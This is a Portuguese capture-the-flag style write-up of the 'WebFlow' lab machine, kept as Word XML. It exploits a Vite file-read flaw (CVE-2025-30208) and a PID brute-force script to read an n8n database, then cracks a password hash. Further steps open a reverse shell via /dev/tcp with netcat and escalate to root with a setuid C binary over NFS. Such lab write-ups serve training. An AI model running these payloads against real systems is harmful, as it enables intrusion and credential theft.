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6qq6p0m174k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1xvt3lw6hlhf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WebFlow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qgn06jwpyvxr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da execução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foram identificadas as seguintes portas expostas no host alvo.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203811"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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81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Foram identificadas portas de interesse, incluindo as portas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durante a fase de varredura.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o serviço disponível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constatou-se um redirecionamento automático para o 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http://webflow.hc/.</w:t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67287"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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28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webflow.hc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adicionado ao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permitindo que o sistema operacional realizasse a resolução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DNS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local durante os testes.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13238"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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2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aplicação por meio do serviço disponível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visualizar a interface inicial do sistema.</w:t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00400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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execução de um fuzzing para descoberta de subdomínios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identificou um subdomínio adicional chamado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automation.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http://webflow.hc/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FUZZ.webflow.hc"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shubs-subdomains.txt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07445"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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44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o subdomínio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automation.webflow.hc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identificar que se tratava de uma instância da aplicação de automação de workflows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n8n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40000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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Também foi conduzido um processo de fuzzing no host principal visando identificar diretórios e arquivos acessíveis na aplicação.</w:t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http://webflow.hc/FUZZ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19664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enumeração foi identificado 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package.json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Sua análise revelou que a aplicação utiliza o framework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front-end Vite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na versão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6.1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identificar a versão e tecnologia empregadas no ambiente.</w:t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78300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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59000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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identificação da tecnologia utilizada, foi constatada a existência de uma vulnerabilidade conhecida para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framework Vite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registrada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CVE-2025-30208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leitura arbitrária de arquivos no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId1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https://github.com/4xura/CVE-2025-30208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vulnerabilidade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CVE-2025-30208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validada com sucesso, sendo possível explorá-la diretamente no ambiente alvo. Ao acessar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/etc/passwd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diretamente.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http://webflow.hc/@fs/etc/passwd?raw??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20900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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da vulnerabilidade de leitura arbitrária de arquivos, foi possível realizar um brute force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PIDs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 objetivo de identificar o caminho completo da aplicação que suporta o subdomínio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automation.webflow.hc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correspondente ao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n8n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concurrent.futures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ThreadPoolExecutor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sincronizar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impressão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print_lock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check_process(i):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requests.get(f"http://webflow.hc/@fs/proc/{i}/cmdline?raw??",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timeout=5)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('n8n'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r.text):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print_lock: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print(f"pid=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{i}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{r.text}")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requests.exceptions.RequestException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max_workers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ThreadPoolExecutor(max_workers=max_workers)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executor.map(check_process,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análise do processo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PID 646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identificar o caminho completo de execução do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n8n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utilizado no subdomínio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automation.webflow.hc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Constatou-se que o binário estava sendo executado a partir do diretório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appsvc,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localizado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/home/appsvc/.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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82700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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identificar o caminho correto da aplicação, foi consultada a documentação oficial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n8n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informa que a aplicação utiliza o banco de dados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SQLite3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armazenamento local de informações sensíveis, incluindo credenciais. Com a exploração da vulnerabilidade de leitura arbitrária de arquivos, foi possível acessar o banco de dados localizado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/home/appsvc/.n8n/database.sqlite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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hyperlink r:id="rId20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https://docs.n8n.io/hosting/configuration/supported-databases-settings/#sqlite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da leitura do banco de dados foi possível obter o usuário e a hash da senha do aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051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kilts@webflow.hc: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http://webflow.hc/@fs/home/appsvc/.n8n/database.sqlite?import&amp;raw??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09800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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hash da senha do usuário foi armazenado em um arquivo chamado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hash.txt.</w:t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65200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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John the Ripper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hash extraído foi submetido a um processo de quebra de senha, resultando na recuperação bem-sucedida da credencial em texto claro.</w:t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--wordlist=~/rockyou.txt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36700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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as credenciais obtidas, foi possível realizar login com sucesso na aplicação n8n.</w:t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kilts@webflow.hc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P@ssw0rd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89200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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Acesso ao painel de administração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(Dashboard do administrador)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 aplicação.</w:t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14600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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Também foi identificado que a aplicação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n8n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possibilita a execução de comandos diretamente no sistema operacional através da criação de workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId2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https://github.com/advisories/GHSA-365g-vjw2-grx8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Selecionando a opção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“Create Workflow”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interface da aplicação para iniciar a criação de um novo fluxo de automação.</w:t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82900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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71700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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foi inserido o termo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“Command”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campo de busca para localizar a opção que permite a execução de comandos no sistema operacional.</w:t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65400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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desse momento, foi configurado e executado um comando dentro da aplicação, o que possibilitou o acionamento de uma reverse shell e o estabelecimento de acesso remoto ao sistema alvo.</w:t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/dev/tcp/&lt;vpn-ip&gt;/443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25700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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lineRule="auto"/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nossa máquina local, foi aberta uma porta utilizando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nc (Netcat)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aguardar a conexão da reverse shell originada no sistema alvo.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-lnvp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90700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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sessão de shell foi posteriormente convertida para um TTY interativo, permitindo uma interação mais completa com o sistema comprometido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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86463" cy="2305050"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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23050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referente ao usuário foi localizada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/home/appsvc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr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14400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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9be9ikd34otg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análise do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/etc/exports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evidenciou que o sistema estava configurado para permitir a montagem remota de uma partição via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NFS,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indicando a possibilidade de acesso externo ao compartilhamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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98700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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dessa configuração, foi possível explorar o compartilhamento NFS para inserir arquivos com bit SUID atribuídos ao usuário root, viabilizando a execução de binários com privilégios elevados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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base nisso, foi desenvolvido um arquivo malicioso em C configurado para definir o UID e o GID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sua execução com privilégios de superusuário.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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&lt;unistd.h&gt;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&lt;stdlib.h&gt;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setgid(0);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setuid(0);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system("/bin/bash");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binário foi compilado localmente na máquina antes de ser transferido para o ambiente alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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gcc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teste.c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-static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73200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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binário foi então transferido para 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/tmp/malicious/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configurado como ponto de montagem do compartilhamento NFS, permitindo que o arquivo ficasse acessível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/tmp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sistema alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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Antes da execução, foram ajustadas as permissões do binário, realizando a alteração de propriedade para o usuário root por meio do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chown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além da configuração do bit SUID, garantindo que sua execução ocorresse com privilégios elevados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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/tmp/malicious/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root:root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u+s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70000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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binário malicioso foi então executado no sistema alvo, resultando na obtenção de privilégios elevados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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65200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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root se encontra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/root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4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87400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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headerReference r:id="rId39" w:type="default"/>
      <w:headerReference r:id="rId40" w:type="first"/>
      <w:headerReference r:id="rId41" w:type="even"/>
      <w:footerReference r:id="rId42" w:type="default"/>
      <w:footerReference r:id="rId43" w:type="first"/>
      <w:footerReference r:id="rId4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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.hbf9me8c9mv1" w:id="4"/>
    <w:bookmarkEnd w:id="4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64" name="image19.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image19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9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A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6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67" name="image18.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image18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3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WebFlow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38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6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2.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.n8n.io/hosting/configuration/supported-databases-settings/#sqlite" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml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s://github.com/advisories/GHSA-365g-vjw2-grx8" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23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6.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/laboratory/competition-machines/300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22.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/4xura/CVE-2025-30208" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId1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jpg"/><Relationship Id="rId2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3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hybMDpRVrnylVNkRFXFuC3bf2w==">CgMxLjAyDmguNnFxNnAwbTE3NGt3Mg5oLjF4dnQzbHc2aGxoZjIOaC5xZ24wNmp3cHl2eHIyDmguOWJlOWlrZDM0b3RnMg5oLmhiZjltZThjOW12MTgAciExdGc5SlVXZF9UTDJidXNZWk1GeE9wQ21Kd0kzbTlscV8=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